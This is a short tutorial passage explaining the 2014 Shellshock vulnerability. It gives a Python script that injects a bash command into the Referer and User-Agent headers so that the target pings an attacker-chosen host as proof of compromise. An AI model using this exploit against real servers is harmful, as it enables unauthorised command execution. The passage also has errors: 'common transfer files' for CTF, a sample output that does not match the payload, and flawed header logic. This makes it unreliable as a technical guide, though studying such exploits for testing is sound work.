Moving away from the standard style of attacks against web servers, we're going to quickly look at Shellshock, a vulnerability that allowed attackers to make shell commands through specific headers. This vulnerability reared its head in 2014 and gained momentum quickly as one of the biggest vulnerabilities of the year. While it has now been mostly fixed, it's a good example of how web servers can be manipulated to perform more complex attacks and are likely to be a frequent target in common transfer files (CTFs) for years to come.
We will create a script that pulls down the headers of a page, identifies whether the vulnerable headers are present, and submits an example payload to that header. This script relies on external infrastructure supporting this attack to collect compromised device call-outs.
Identify the URL you wish to test. Once you've identified your target web page, pass it to the script as a sys.argv:
Your script should be the same as the following script:
import requests
import sys
url = sys.argv[1]
payload = "() { :; }; /bin/bash -c 'ping –c 1 –p pwnt <url/ip>'"
headers ={}
r = requests.head(url)
for header in r.headers:
if header == "referer" or header == "User-Agent":
headers[header] = payload
req = requests.post(url, headers=headers)The script won't provide output as it targets the admin side of functionality. However, you could set it to provide an output on each loop easily with:
Print "Submitted "+payload
This would return the following every time:
Submitted <script>alert(1);</script>
We import the libraries that we require for this script and take input in the form of a sys.argv function. This is getting a bit repetitive, but it gets the job done.
We declare our payload as a singular entity. If you have multiple actions that you wish to perform upon the server, you can make this a payload, similar to the preceding. We also create an empty dictionary for our header-payload combinations and make a HEAD request to the target URL:
payload = "() { :; }; /bin/bash -c 'ping –c 1 –p pwnt <url/ip>'"
headers ={}
r = requests.head(url)The payload set here will ping whichever server you set at the <url/ip> space. It will send a message in that ping, which is pwnt. This allows you to identify that the server has actually been compromised and it's not just a random server.
We then go through each header we pulled in the initial HEAD request and check to see if any are the referrer or User-Agent headers, which are the headers vulnerable to the Shellshock attack. If those headers are present, we send our attack string against that header:
for header in r.headers:
if header == "referer" or header == "User-Agent":
headers[header] = payloadOnce we've established if our headers are present and having set the attack string against them, we launch our request. If successful, the message should appear in our logs:
req = requests.post(url, headers=headers)